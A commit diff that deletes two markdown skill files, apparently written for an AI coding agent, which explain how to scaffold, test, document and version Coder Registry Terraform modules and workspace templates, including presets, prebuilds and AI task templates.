hopefully final wip

wip
2026-06-03 13:08:14 +00:00 · 2026-01-20 17:49:05 +00:00 · 2026-01-20 17:43:22 +00:00 · 2026-01-20 17:35:20 +00:00 · 2026-01-20 17:19:25 +00:00 · 2026-01-20 17:14:57 +00:00
126 changed files with 735 additions and 9371 deletions
@@ -1,369 +0,0 @@
---
-name: coder-modules
-description: Creates and updates Coder Registry modules with proper scaffolding, Terraform testing, README frontmatter, and version management
---
-
-# Coder Modules
-
-Coder Registry modules are reusable Terraform components that live under `registry/<namespace>/modules/<name>/` and are consumed by templates via `module` blocks.
-
-## Before You Start
-
-Before writing or modifying any code:
-
-1. **Understand the request.** What tool, integration, or functionality is the module providing? What Coder resources does it need (`coder_script`, `coder_app`, `coder_env`, etc.)? Read the official documentation for the target tool or integration (installation steps, CLI flags, config files, environment variables, ports) so you can implement the module properly without guessing.
-2. **Research existing modules.** Search the registry for similar modules. Read their `main.tf` to understand patterns, variable conventions, and how they solve similar problems. Avoid duplicating existing functionality.
-3. **Check the Coder provider docs.** Verify that the resources and attributes you plan to use exist in the provider version you're targeting. Use the version-specific docs URL if needed.
-4. **Clarify before building.** If the request is ambiguous (e.g. unclear which Coder resource to use, whether a `coder_app` vs `coder_script` is appropriate, what variables to expose, or which namespace to use), ask for clarification rather than guessing. Never assume a namespace; always confirm with the user.
-5. **Plan the structure.** Decide on script organization (root `run.sh`, `scripts/` directory, or inline), what variables to expose, and what tests to write.
-
-Always prefer the proper implementation over a simpler shortcut. Modules are infrastructure that users depend on. Doing less work is not the same as reducing complexity if it leaves the module incomplete or fragile.
-
-## Documentation References
-
-### Coder
-
- Coder docs (latest): <https://coder.com/docs>
- Version-specific Coder docs: `https://coder.com/docs/@v{MAJOR}.{MINOR}.{PATCH}` (e.g. <https://coder.com/docs/@v2.31.5>)
- Coder Registry: <https://registry.coder.com>
-
-### Coder Terraform provider
-
- Provider docs (latest): <https://registry.terraform.io/providers/coder/coder/latest/docs>
- Version-specific provider docs: replace `latest` with a version number (e.g. <https://registry.terraform.io/providers/coder/coder/2.13.1/docs>)
-
-Resources:
-
-| Resource         | Docs                                                                                 |
-| ---------------- | ------------------------------------------------------------------------------------ |
-| `coder_app`      | <https://registry.terraform.io/providers/coder/coder/latest/docs/resources/app>      |
-| `coder_script`   | <https://registry.terraform.io/providers/coder/coder/latest/docs/resources/script>   |
-| `coder_env`      | <https://registry.terraform.io/providers/coder/coder/latest/docs/resources/env>      |
-| `coder_metadata` | <https://registry.terraform.io/providers/coder/coder/latest/docs/resources/metadata> |
-
-Data sources:
-
-| Data Source             | Docs                                                                                           |
-| ----------------------- | ---------------------------------------------------------------------------------------------- |
-| `coder_parameter`       | <https://registry.terraform.io/providers/coder/coder/latest/docs/data-sources/parameter>       |
-| `coder_workspace`       | <https://registry.terraform.io/providers/coder/coder/latest/docs/data-sources/workspace>       |
-| `coder_workspace_owner` | <https://registry.terraform.io/providers/coder/coder/latest/docs/data-sources/workspace_owner> |
-
-## Scaffolding a New Module
-
-Only use this when creating a brand new module that does not yet exist. When updating an existing module, edit its files directly.
-
-From repo root:
-
-```bash
-./scripts/new_module.sh namespace/module-name
-```
-
-Names must be lowercase alphanumeric with hyphens (e.g. `coder/my-tool`). Underscores are not allowed.
-
-Creates `registry/<namespace>/modules/<module-name>/` with:
-
- `main.tf`: Terraform config with common resource patterns and variables — read this as the primary reference for module structure
- `README.md`: frontmatter and usage examples
- `MODULE_NAME.tftest.hcl`: Terraform native tests
- `run.sh`: install/start-up script template
-
-If the namespace is new, the script also creates `registry/<namespace>/` with a README. New namespaces additionally need:
-
- `registry/<namespace>/.images/avatar.svg` (or `.png`): square image, 400x400px minimum
- The namespace README `avatar` field pointing to `./.images/avatar.svg`
-
-The scaffolding script does not create the `.images/` directory or avatar file. When a new namespace is created, create `registry/<namespace>/.images/` and add a placeholder `avatar.svg` so the directory structure is ready for the user to replace with their real avatar.
-
-The generated namespace README contains placeholder fields (`display_name`, `bio`, `status`, `github`, `avatar`, etc.) that the user must fill out. The `status` field is required and must be `official`, `partner`, or `community` (typically `community` for new contributors).
-
-## Key Patterns
-
- Provider version constraints must reflect actual functionality requirements. Only raise the minimum `coder` provider version (e.g. `>= 2.5` to `>= 2.8`) when the module uses a resource, attribute, or behavior introduced in that version; check the provider changelog to confirm.
- Variable names MUST be `snake_case` (no hyphens; validation rejects them)
- New variables must have sensible defaults for backward compatibility
- Common variable: `agent_id` (string, required, no default)
- Common variable: `order` (number, default `null`, controls UI position)
- Use `locals {}` for computed values: URL normalization, base64 encoding, `file()` script content, config assembly
- Modules can consume other registry modules via `module` blocks (e.g. `cursor` uses `vscode-desktop-core`, CLI wrappers use `agentapi`). Before consuming a module, read its `main.tf` and `README.md` to understand the full interface: accepted variables, outputs, prerequisites, and runtime requirements. If you are inside the registry repo, read these files directly. Otherwise, read the module's page at `https://registry.coder.com/modules/<namespace>/<module-name>` which includes the full source, README, and variable definitions. Never pass arguments without confirming they exist.
- Most modules expose configuration via `variable` blocks, letting the template pass values. Use `coder_parameter` inside a module only when the module needs to present a UI choice directly to the workspace user (e.g. region selectors, IDE pickers).
- For parameter-only modules (region selectors, etc.), use `dynamic "option"` with `for_each` from a `locals` map and expose an `output` for the selected value.
- `coder_script` icons use the `/icon/<name>.svg` format. The `display_name` is typically the product name (e.g. "code-server", "Git Clone", "File Browser").
- Do not add comments that narrate what the code does or label sections. Only comment when explaining something non-obvious (e.g. why a workaround exists, a subtle constraint, or an unusual design choice).
-
-## README.md
-
-Required YAML frontmatter:
-
-```yaml
---
-display_name: My Tool
-description: Short description of what this module does
-icon: ../../../../.icons/tool.svg
-verified: false
-tags: [helper, ide]
---
-```
-
-Content rules:
-
- Single H1 heading matching `display_name`, directly below frontmatter
- When increasing header levels, increment by one each time (h1 -> h2 -> h3, not h1 -> h3)
- Usage snippet with `registry.coder.com/<ns>/<module>/coder` and pinned `version`
- Code fences labeled `tf` (NOT `hcl`)
- Relative icon paths (e.g. `../../../../.icons/`)
- **Do NOT include tables or lists that enumerate variables, parameters, or outputs.** The registry generates variable and output documentation automatically from the Terraform source. Describe what the module does and how to use it in prose, not by listing every configurable field.
- Usage examples are encouraged
- Use [GFM alerts](https://docs.github.com/en/get-started/writing-on-github/getting-started-with-writing-and-formatting-on-github/basic-writing-and-formatting-syntax#alerts) for callouts: `> [!NOTE]`, `> [!TIP]`, `> [!IMPORTANT]`, `> [!WARNING]`, `> [!CAUTION]`
-
-```tf
-module "my_tool" {
-  count    = data.coder_workspace.me.start_count
-  source   = "registry.coder.com/namespace/my-tool/coder"
-  version  = "1.0.0"
-  agent_id = coder_agent.main.id
-}
-```
-
-## Icons
-
-Modules reference icons in two places with different path systems:
-
- **README frontmatter** `icon:` uses a relative path to the repo's `.icons/` directory (e.g. `../../../../.icons/my-tool.svg`). Displayed on the registry website.
- **`coder_script` / `coder_app`** `icon =` uses an absolute `/icon/<name>.svg` path served by the Coder deployment from `site/static/icon/` in the `coder/coder` repo. Displayed in the workspace agent bar.
-
-Workflow:
-
-1. **Check what exists.** List the `.icons/` directory at the repo root for available SVGs. For `/icon/` paths, look at what similar modules already use.
-2. **Use existing icons when they fit.** If the tool already has an icon in `.icons/` and `/icon/`, use those.
-3. **When an icon doesn't exist,** reference the expected path anyway (e.g. `../../../../.icons/my-tool.svg` and `/icon/my-tool.svg`) so the structure is correct. Try to source the official SVG from the tool's branding page or repository. If you can obtain it, add it to `.icons/` in this repo.
-4. **Don't substitute a generic icon.** If the tool has its own brand identity, use the correct name even if the file doesn't exist yet. Don't fall back to generic icons like `coder.svg` or `terminal.svg`.
-5. **Track missing icons** so you can report them in your response.
-
-## Scripts
-
-Modules use three patterns for shell logic, depending on complexity:
-
-### Root `run.sh` + `templatefile()` (simple modules)
-
-A single `run.sh` at the module root, loaded via `templatefile()` to inject Terraform variables. Used by `code-server`, `vscode-web`, `git-clone`, `dotfiles`, `filebrowser`.
-
-```tf
-resource "coder_script" "my_tool" {
-  agent_id     = var.agent_id
-  display_name = "My Tool"
-  icon         = "/icon/my-tool.svg"
-  script = templatefile("${path.module}/run.sh", {
-    LOG_PATH : var.log_path,
-  })
-  run_on_start = true
-}
-```
-
-Use `$${VAR}` (double dollar) in the shell script for Terraform `templatefile` escaping.
-
-If a script sources external files (`$HOME/.bashrc`, `/etc/bashrc`, `/etc/os-release`), the `source` statement must come before `set -u`; CI enforces this ordering.
-
-### `scripts/` directory + `file()` (complex modules)
-
-Separate `scripts/install.sh` and `scripts/start.sh` loaded via `file()` into `locals`, then passed to a child module or encoded inline. Used by `coder/claude-code`, `coder-labs/copilot`, `coder-labs/codex`, `coder-labs/cursor-cli`, `coder/amazon-q` for example.
-
-```tf
-locals {
-  install_script = file("${path.module}/scripts/install.sh")
-  start_script   = file("${path.module}/scripts/start.sh")
-}
-```
-
-Use `file()` when scripts don't need Terraform variable interpolation. For config templates, use a `templates/` directory with `templatefile()` (e.g. `coder/amazon-q/templates/agent-config.json.tpl`).
-
-### Inline heredoc (minimal modules)
-
-For trivial logic, embed the script directly in the `coder_script` resource. Used by `cursor`, `zed`.
-
-Modules that use a `scripts/` directory often also have a `testdata/` directory containing mock scripts for testing (e.g. `testdata/my-tool-mock.sh`).
-
-## Testing
-
-### .tftest.hcl (Required)
-
-Every module must have Terraform native tests. The file can be named `main.tftest.hcl` or `<module-name>.tftest.hcl`. Use `command = plan` for most cases:
-
-```hcl
-run "plan_with_defaults" {
-  command = plan
-
-  variables {
-    agent_id = "test-agent-id"
-  }
-
-  assert {
-    condition     = var.agent_id == "test-agent-id"
-    error_message = "agent_id should be set"
-  }
-}
-
-run "custom_port" {
-  command = plan
-
-  variables {
-    agent_id = "test-agent-id"
-    port     = 8080
-  }
-
-  assert {
-    condition     = resource.coder_app.my_tool.url == "http://localhost:8080"
-    error_message = "App URL should use configured port"
-  }
-}
-```
-
-Advanced patterns:
-
- `override_data` to mock data sources like `coder_workspace` and `coder_workspace_owner`
- `command = apply` when testing outputs or computed values
- `expect_failures` to test validation rules
- `regexall()` / `startswith()` / `endswith()` for string assertions
- Assert on `coder_env`, `coder_script`, `coder_app` resource attributes
-
-```hcl
-run "with_mocked_workspace" {
-  command = apply
-
-  variables {
-    agent_id = "foo"
-  }
-
-  override_data {
-    target = data.coder_workspace.me
-    values = {
-      name = "test-workspace"
-    }
-  }
-
-  assert {
-    condition     = output.url == "expected-value"
-    error_message = "URL should match expected format"
-  }
-}
-
-run "validation_rejects_conflict" {
-  command = plan
-
-  variables {
-    agent_id       = "test"
-    option_a       = true
-    option_b       = true
-  }
-
-  expect_failures = [
-    var.option_a,
-  ]
-}
-```
-
-### main.test.ts (Optional)
-
-For more complex testing (Docker containers, script execution, HTTP mocking).
-Import from `~test` (mapped to `test/test.ts` via `tsconfig.json`):
-
-```typescript
-import { describe, expect, it } from "bun:test";
-import {
-  runTerraformApply,
-  runTerraformInit,
-  testRequiredVariables,
-  findResourceInstance,
-} from "~test";
-
-describe("my-tool", () => {
-  it("should init successfully", async () => {
-    await runTerraformInit(import.meta.dir);
-  });
-
-  testRequiredVariables(import.meta.dir, {
-    agent_id: "test-agent",
-  });
-
-  it("should apply with defaults", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "test-agent",
-    });
-    const app = findResourceInstance(state, "coder_app");
-    expect(app.slug).toBe("my-tool");
-    expect(app.display_name).toBe("My Tool");
-  });
-});
-```
-
-### Test utility API (`~test`)
-
-**Terraform helpers:**
-
- `runTerraformInit(dir)`: runs `terraform init`.
- `runTerraformApply(dir, vars, customEnv?)`: runs `terraform apply` with a random state file and returns `TerraformState`. Variables are passed as `TF_VAR_*`. Safe to run in parallel. `TerraformState` has `outputs: Record<string, TerraformOutput>` and `resources: TerraformStateResource[]`.
- `testRequiredVariables(dir, vars)`: auto-generates test cases (one success with all vars, plus one per var verifying apply fails without it). Pass `{}` if there are no required vars.
- `findResourceInstance(state, type, name?)`: finds the first resource instance by type. Throws if not found. Optionally filters by name.
-
-**Docker helpers** (require `--network host`, Linux/Colima/OrbStack):
-
- `runContainer(image, init?)`: starts a detached container and returns its ID. Labeled `modules-test=true` for auto-cleanup.
- `removeContainer(id)`: force-removes a container.
- `execContainer(id, cmd[], args?[])`: runs a command in a container and returns `{ exitCode, stdout, stderr }`.
- `executeScriptInContainer(state, image, shell?, before?)`: finds `coder_script` in state, runs it in a container, and returns `{ exitCode, stdout: string[], stderr: string[] }`.
-
-**File helpers:**
-
- `writeCoder(id, script)`: writes a mock `coder` CLI to `/usr/bin/coder` in the container.
- `writeFileContainer(id, path, content, { user? })`: writes a file to the container via base64.
- `readFileContainer(id, path)`: reads a file from the container as root.
-
-**HTTP helpers:**
-
- `createJSONResponse(obj, statusCode?)`: creates a `Response` with a JSON body (defaults to 200).
-
-Cleanup of `*.tfstate` files and `modules-test` Docker containers is handled automatically by `setup.ts` (preloaded via `bunfig.toml`).
-
-## Commands
-
-| Task             | Command                                               | Scope      |
-| ---------------- | ----------------------------------------------------- | ---------- |
-| Format all       | `bun run fmt`                                         | Repo       |
-| Terraform tests  | `bun run tftest`                                      | Repo       |
-| TypeScript tests | `bun run tstest`                                      | Repo       |
-| Single TF test   | `terraform init -upgrade && terraform test -verbose`  | Module dir |
-| Single TS test   | `bun test main.test.ts`                               | Module dir |
-| Validate         | `./scripts/terraform_validate.sh`                     | Repo       |
-| ShellCheck       | `bun run shellcheck`                                  | Repo       |
-| Version bump     | `.github/scripts/version-bump.sh patch\|minor\|major` | Repo       |
-
-## Version Management
-
-Bump version via `.github/scripts/version-bump.sh` when modifying modules:
-
- `patch`: bugfixes
- `minor`: new features, new variables with defaults
- `major`: breaking changes (removed inputs, changed defaults, new required variables)
-
-The script automatically updates `version` references in README usage examples.
-
-## Final Checks
-
-Before considering the work complete, verify:
-
- Tests pass: `bun run tftest` and `bun run tstest`
- `bun run fmt` has been run
- `bun run shellcheck` passes if the module includes shell scripts
- New variables have sensible defaults for backward compatibility
- Breaking changes are documented if any inputs were removed, defaults changed, or new required variables added
- Shell scripts handle errors gracefully (`|| echo "Warning..."` for non-fatal failures)
- No hardcoded values that should be configurable via variables
- Asset and icon paths in frontmatter and Terraform must be relative (e.g. `../../../../.icons/`), not absolute. External hyperlinks to docs or other websites are fine.
-
-## Response to the User
-
-In your response, include:
-
- If a new namespace was created, remind the user to fill out the namespace README (`display_name`, `bio`, `status`, `github`, etc.) and replace the placeholder avatar. Note that this is only needed if they plan to contribute to the registry.
- If any icons were referenced but not found, list them and note they need to be sourced and added to both this repo's `.icons/` directory and the `coder/coder` repo at `site/static/icon/`.
- A note that to contribute the module to the public registry, they can open a pull request to <https://github.com/coder/registry>.
@@ -1,321 +0,0 @@
---
-name: coder-templates
-description: Creates and updates Coder Registry workspace templates with agent setup, infrastructure provisioning, and module consumption
---
-
-# Coder Templates
-
-Coder workspace templates are complete workspace definitions that live under `registry/<namespace>/templates/<name>/` and provision the infrastructure that workspaces run on.
-
-## Before You Start
-
-Before writing or modifying any code:
-
-1. **Understand the request.** What platform is the template targeting (Docker, AWS, GCP, Azure, Kubernetes)? What kind of workspace (VM, container, devcontainer)?
-2. **Research existing templates and modules.** Look under `registry/` in this repo for similar templates and modules first; if you are not in the repo or cannot find a match, browse <https://registry.coder.com>. Read `main.tf` to understand patterns for that platform, especially how they handle agent setup, persistent storage, and module consumption. Prefer platform-specific helper modules (e.g. region selectors) that provide ready-made `coder_parameter` blocks over hard-coding option lists.
-3. **Check provider docs.** Verify the infrastructure provider resources you plan to use. Check both the Coder provider and the platform provider (AWS, Docker, etc.) version-specific docs if needed.
-4. **Clarify before building.** If the request is ambiguous (e.g. unclear platform, whether to use devcontainers vs plain VMs, what parameters to expose, or which namespace to use), ask for clarification rather than guessing. Never assume a namespace; always confirm with the user.
-5. **Plan the structure.** Decide on infrastructure resources, what `coder_parameter` options to expose, which registry modules to consume, and whether additional files like cloud-init configs are needed. When the user describes requirements in terms of their development needs rather than specific Terraform changes (e.g. "I need Node 20 + Postgres 16" or "make this template work for data science"), summarize what you plan to add or change before proceeding. Keep it brief: list the parameters, modules, and infrastructure changes. Skip this for straightforward requests where the action is clear (e.g. "add the code-server module" or "change the default region to us-west-2").
-
-When updating an existing template, read and understand all of its current resources, parameters, and module consumption before making changes. If you observe patterns that deviate from the coder template standards (e.g. missing metadata blocks, hardcoded values that should be parameters, inline implementations that existing modules could replace, missing error handling in scripts), note these to the user as improvement opportunities in your response.
-
-Always prefer the proper implementation over a simpler shortcut. Templates are infrastructure that users depend on. Doing less work is not the same as reducing complexity if it leaves the template incomplete or fragile.
-
-Features marked as "Premium" in this skill require a Coder Premium license. When your implementation uses a Premium feature, note this in your response to the user so they can verify their deployment supports it.
-
-## Documentation References
-
-### Coder
-
- Platform docs (latest): <https://coder.com/docs>
- Version-specific docs: `https://coder.com/docs/@v{MAJOR}.{MINOR}.{PATCH}` (e.g. <https://coder.com/docs/@v2.31.5>)
- Creating templates: <https://coder.com/docs/admin/templates/creating-templates>
- Extending templates: <https://coder.com/docs/admin/templates/extending-templates>
- Template parameters: <https://coder.com/docs/admin/templates/extending-templates/parameters>
- Dynamic parameters: <https://coder.com/docs/admin/templates/extending-templates/dynamic-parameters>
- Workspace presets: <https://coder.com/docs/admin/templates/extending-templates/parameters#workspace-presets>
- Prebuilt workspaces: <https://coder.com/docs/admin/templates/extending-templates/prebuilt-workspaces>
- Tasks: <https://coder.com/docs/ai-coder/tasks>
- Agent Boundaries: <https://coder.com/docs/ai-coder/agent-boundaries>
- Coder Registry: <https://registry.coder.com>
-
-### Coder Terraform provider
-
- Provider docs (latest): <https://registry.terraform.io/providers/coder/coder/latest/docs>
- Version-specific provider docs: replace `latest` with a version number (e.g. <https://registry.terraform.io/providers/coder/coder/2.13.1/docs>)
-
-Resources:
-
-| Resource         | Docs                                                                                 |
-| ---------------- | ------------------------------------------------------------------------------------ |
-| `coder_agent`    | <https://registry.terraform.io/providers/coder/coder/latest/docs/resources/agent>    |
-| `coder_app`      | <https://registry.terraform.io/providers/coder/coder/latest/docs/resources/app>      |
-| `coder_script`   | <https://registry.terraform.io/providers/coder/coder/latest/docs/resources/script>   |
-| `coder_env`      | <https://registry.terraform.io/providers/coder/coder/latest/docs/resources/env>      |
-| `coder_metadata` | <https://registry.terraform.io/providers/coder/coder/latest/docs/resources/metadata> |
-| `coder_ai_task`  | <https://registry.terraform.io/providers/coder/coder/latest/docs/resources/ai_task>  |
-
-Data sources:
-
-| Data Source              | Docs                                                                                            |
-| ------------------------ | ----------------------------------------------------------------------------------------------- |
-| `coder_parameter`        | <https://registry.terraform.io/providers/coder/coder/latest/docs/data-sources/parameter>        |
-| `coder_workspace`        | <https://registry.terraform.io/providers/coder/coder/latest/docs/data-sources/workspace>        |
-| `coder_workspace_owner`  | <https://registry.terraform.io/providers/coder/coder/latest/docs/data-sources/workspace_owner>  |
-| `coder_provisioner`      | <https://registry.terraform.io/providers/coder/coder/latest/docs/data-sources/provisioner>      |
-| `coder_workspace_preset` | <https://registry.terraform.io/providers/coder/coder/latest/docs/data-sources/workspace_preset> |
-| `coder_task`             | <https://registry.terraform.io/providers/coder/coder/latest/docs/data-sources/task>             |
-
-### Terraform providers commonly used in templates
-
-All provider docs follow `https://registry.terraform.io/providers/ORG/NAME/latest/docs`:
-
-| Provider   | Source                 |
-| ---------- | ---------------------- |
-| Docker     | `kreuzwerker/docker`   |
-| AWS        | `hashicorp/aws`        |
-| Azure      | `hashicorp/azurerm`    |
-| GCP        | `hashicorp/google`     |
-| Kubernetes | `hashicorp/kubernetes` |
-| Cloud-Init | `hashicorp/cloudinit`  |
-
-Browse all providers: <https://registry.terraform.io/browse/providers>
-
-## Scaffolding a New Template
-
-Only use this when creating a brand new template that does not yet exist. When updating an existing template, edit its files directly.
-
-From repo root:
-
-```bash
-./scripts/new_template.sh namespace/template-name
-```
-
-Names must be lowercase alphanumeric with hyphens (e.g. `my-org/aws-ec2`). Underscores are not allowed.
-
-Creates `registry/<namespace>/templates/<template-name>/` with:
-
- `main.tf`: full workspace Terraform config with common patterns — read this as the primary reference for template structure
- `README.md`: frontmatter and documentation
-
-If the namespace is new, the script also creates `registry/<namespace>/` with a README. New namespaces additionally need:
-
- `registry/<namespace>/.images/avatar.svg` (or `.png`): square image, 400x400px minimum
- The namespace README `avatar` field pointing to `./.images/avatar.svg`
-
-The scaffolding script does not create the `.images/` directory or avatar file. When a new namespace is created, create `registry/<namespace>/.images/` and add a placeholder `avatar.svg` so the directory structure is ready for the user to replace with their real avatar.
-
-The generated namespace README contains placeholder fields (`display_name`, `bio`, `status`, `github`, `avatar`, etc.) that the user must fill out. The `status` field is required and must be `official`, `partner`, or `community` (typically `community` for new contributors).
-
-## Key Patterns
-
- Provider version constraints must reflect actual functionality requirements. Only set a minimum `coder` provider version when the template uses a resource, attribute, or behavior introduced in that version. The same applies to infrastructure providers (Docker, AWS, etc.); check provider changelogs to confirm.
- Include `data.coder_workspace.me` and `data.coder_workspace_owner.me` for workspace and owner metadata. Include `data.coder_provisioner.me` only when you need the provisioner's `arch` or `os` for `coder_agent` (typical for Docker, Kubernetes, Incus); omit when the workspace OS/arch is fixed (e.g. cloud VMs with a known image).
- Use `locals {}` for computed values: username, environment variables, startup scripts, URL assembly
- Use `data.coder_workspace.me.start_count` as `count` on ephemeral resources
- Connect containers/VMs to the agent via `coder_agent.main.init_script` and `CODER_AGENT_TOKEN`
- Add `metadata` blocks for workspace dashboard stats (`coder stat cpu`, `coder stat mem`, etc.)
- Use `coder_metadata` on the primary compute resource to surface key details (region, instance type, image, disk size) in the workspace dashboard
- Optionally use `display_apps` block to hide specific built-in apps (defaults show all)
- Before implementing functionality from scratch, look for an existing module under `registry/*/modules/` in this repo; if you cannot find one or are not in the repo, search <https://registry.coder.com>. If a module already exists for what you need, consume it rather than reimplementing it. When multiple modules serve similar purposes, prefer the actively maintained one and check that you are not using a deprecated or superseded module.
- Before consuming a module, read its `main.tf` and `README.md` to understand the full interface: accepted variables, outputs, prerequisites, and runtime requirements. Prefer paths under `registry/<namespace>/modules/<name>/` in this workspace; otherwise use `https://registry.coder.com/modules/<namespace>/<module-name>`. Never pass arguments without confirming they exist.
- After identifying a module's prerequisites, verify the template's base image satisfies them. If it lacks a required tool, either switch to an image that includes it or ensure the prerequisite is installed before the module's script runs. These runtime issues are not caught by `terraform validate`; they only surface when the workspace starts.
- Module source URLs use `registry.coder.com/<namespace>/<module>/coder`. Older templates may use `registry.coder.com/modules/...`; prefer the shorter form when writing new modules or templates.
- Label infrastructure resources with `coder.owner` and `coder.workspace_id` for tracking orphans
- Use `lifecycle { ignore_changes = all }` on persistent volumes to prevent data loss
- Do not add comments that narrate what the code does or label sections. Only comment when explaining something non-obvious (e.g. why a workaround exists, a subtle constraint, or an unusual design choice).
-
-### Additional files
-
-Templates can include files beyond `main.tf` + `README.md`:
-
- `cloud-init/*.tftpl`: cloud-init configs for VM provisioning (AWS, Azure, GCP), loaded via `templatefile()`. Prefer this subdirectory over placing cloud-init files at the template root.
- `build/Dockerfile`: custom container images built by the template
- `.tftpl` files: any Terraform template files for scripts, configs, or cloud-init data
-
-### Parameters
-
-Use `data "coder_parameter"` for user-facing workspace options. Typical parameters: region/instance type/CPU/memory/disk for cloud VMs; container image or runtime version for Docker (pass as `build_arg` when using a local Dockerfile). Use same-platform templates in `registry/` as a starting reference, not a rigid pattern. Expose stated preferences as the parameter `default` with additional sensible `option` values unless the user explicitly restricts it.
-
- Prefer `dynamic "option"` blocks with `for_each` from a `locals` map over static `option` blocks. See the region selector modules (e.g. `coder/aws-region`) for the pattern.
- Use `form_type` for richer UI controls: `dropdown` (searchable), `multi-select` (for `list(string)`), `slider` (numeric), `radio`, `checkbox`, `textarea`.
- Conditional parameters: use `count` to show/hide a parameter based on another parameter's value.
- `mutable = false` for infrastructure that can't change after creation (region, disk); `mutable = true` for runtime config.
- `ephemeral = true` for one-shot build options that don't persist between starts.
- `validation {}` with `min`/`max`/`monotonic` for numbers, `regex`/`error` for strings.
- Dynamic parameter features require Coder provider `>= 2.4.0`.
-
-### Presets
-
-Workspace presets bundle commonly-used parameter combinations into selectable options. When a user creates a workspace, they can pick a preset to auto-fill multiple parameters at once. Define presets with `data "coder_workspace_preset"`:
-
-```tf
-data "coder_workspace_preset" "default" {
-  name    = "Standard Dev Environment"
-  default = true
-
-  parameters = {
-    "region"          = "us-east-1"
-    "cpu"             = "4"
-    "memory"          = "8"
-    "container_image" = "codercom/enterprise-base:ubuntu"
-  }
-}
-```
-
- The keys in `parameters` must match the `name` attribute of `coder_parameter` data sources in the same template.
- Set `default = true` on at most one preset to pre-select it in the UI.
- A template can define multiple presets for different use cases.
- Optional fields: `description` (context text in UI) and `icon` (e.g. `/emojis/1f680.png`).
-
-### Prebuilds (Premium)
-
-Prebuilds maintain an automatically-managed pool of pre-provisioned workspaces for a preset, reducing workspace creation time. This is a Premium feature. Prebuilds are configured as a nested block inside a preset:
-
-```tf
-data "coder_workspace_preset" "goland" {
-  name = "GoLand: Large"
-  parameters = {
-    "jetbrains_ide" = "GO"
-    "cpu"           = "8"
-    "memory"        = "16"
-  }
-
-  prebuilds {
-    instances = 3
-
-    expiration_policy {
-      ttl = 86400
-    }
-
-    scheduling {
-      timezone = "UTC"
-      schedule {
-        cron      = "* 8-18 * * 1-5"
-        instances = 5
-      }
-    }
-  }
-}
-```
-
- `instances`: number of prebuilt workspaces to keep in the pool (base count when no schedule matches).
- `expiration_policy.ttl`: seconds before unclaimed prebuilds are cleaned up.
- `scheduling`: scale the pool up or down on a time-based cron schedule. The `cron` minute field must always be `*`.
- The preset must define all required parameters needed to build the workspace.
- When a prebuild is claimed, ownership transfers to the real user. Use `lifecycle { ignore_changes = [...] }` on resources that reference owner-specific values to prevent unnecessary recreation.
-
-### Task-Oriented Templates
-
-A template becomes task-capable by adding a `coder_ai_task` resource, which enables the Coder Tasks UI for AI agent workflows. Task templates require three additions on top of a regular template:
-
-```tf
-resource "coder_ai_task" "task" {
-  count  = data.coder_workspace.me.start_count
-  app_id = module.claude-code[count.index].task_app_id
-}
-
-data "coder_task" "me" {}
-
-module "claude-code" {
-  count           = data.coder_workspace.me.start_count
-  source          = "registry.coder.com/coder/claude-code/coder"
-  version         = "~> 4.0"
-  agent_id        = coder_agent.main.id
-  workdir         = "/home/coder/projects"
-  ai_prompt       = data.coder_task.me.prompt
-  system_prompt   = data.coder_parameter.system_prompt.value
-  model           = "sonnet"
-  permission_mode = "plan"
-  enable_boundary = true
-}
-```
-
- `coder_ai_task`: declares the template as task-capable. Its `app_id` must point to the agent module's `task_app_id` output.
- `data "coder_task"`: reads the user's task prompt. Pass it to the agent module via `ai_prompt`.
- Agent module: consume an AI agent module (`claude-code`, `codex`, etc.) with task-specific variables. Key variables include `ai_prompt`, `system_prompt`, `permission_mode`, and `enable_boundary`.
- Boundaries: set `enable_boundary = true` on the agent module to enable network-level filtering for the AI agent. See <https://coder.com/docs/ai-coder/agent-boundaries> for allowlist configuration.
- A `coder_app` with `slug = "preview"` gets special treatment in the Tasks UI navbar.
- Task templates heavily use presets to define scenarios (different repos, system prompts, setup scripts, container images).
- See `registry/coder-labs/templates/tasks-docker` as a reference implementation.
-
-Docs: <https://coder.com/docs/ai-coder/tasks>
-
-## README.md
-
-Required YAML frontmatter:
-
-```yaml
---
-display_name: Docker Containers
-description: Provision Docker containers with persistent home volumes as Coder workspaces
-icon: ../../../../.icons/docker.svg
-verified: false
-tags: [docker, container]
---
-```
-
-Content rules:
-
- Single H1 heading matching `display_name`, directly below frontmatter
- When increasing header levels, increment by one each time (h1 -> h2 -> h3, not h1 -> h3)
- Opening paragraph describing what the template provisions. Be specific about the platform, compute type, and key capabilities (e.g. "Provision Kubernetes pods on an existing Amazon EKS cluster as Coder workspaces with persistent home volumes") rather than generic (e.g. "AWS Kubernetes template"). The frontmatter `description` field should follow the same principle.
- **Prerequisites** section (infrastructure requirements, provider credentials)
- **Architecture** section (what resources are created, what's ephemeral vs persistent)
- Code fences labeled `tf` (NOT `hcl`)
- Relative icon paths (e.g. `../../../../.icons/`)
- **Do NOT include tables or lists that enumerate variables, parameters, or outputs.** The registry generates variable and output documentation automatically from the Terraform source. Workspace parameter options are visible in the Coder UI. Describe what the template does and how to use it in prose, not by listing every configurable field.
- Use [GFM alerts](https://docs.github.com/en/get-started/writing-on-github/getting-started-with-writing-and-formatting-on-github/basic-writing-and-formatting-syntax#alerts) for callouts: `> [!NOTE]`, `> [!TIP]`, `> [!IMPORTANT]`, `> [!WARNING]`, `> [!CAUTION]`
-
-## Icons
-
-Templates reference icons in the README frontmatter `icon:` field using a relative path to the repo's `.icons/` directory (e.g. `../../../../.icons/aws.svg`). This icon is displayed on the registry website.
-
-Workflow:
-
-1. **Check what exists.** List the `.icons/` directory at the repo root for available SVGs.
-2. **Use existing icons when they fit.** Most templates use a platform icon (aws, gcp, azure, docker, kubernetes) that already exists.
-3. **When an icon doesn't exist,** reference the expected path anyway so the structure is correct. Try to source the official SVG from the platform's branding page or repository. If you can obtain it, add it to `.icons/` in this repo.
-4. **Don't substitute a generic icon.** If the platform has its own brand identity, use the correct name even if the file doesn't exist yet.
-5. **Track missing icons** so you can report them in your response.
-
-## Testing
-
-Templates do NOT require `.tftest.hcl` or `main.test.ts`. Testing is done by pushing the template to a Coder deployment.
-
-## Commands
-
-| Task       | Command                           | Scope |
-| ---------- | --------------------------------- | ----- |
-| Format all | `bun run fmt`                     | Repo  |
-| Validate   | `./scripts/terraform_validate.sh` | Repo  |
-| ShellCheck | `bun run shellcheck`              | Repo  |
-
-## Final Checks
-
-Before considering the work complete, verify:
-
- `terraform init && terraform validate` passes in the template directory
- `bun run fmt` has been run
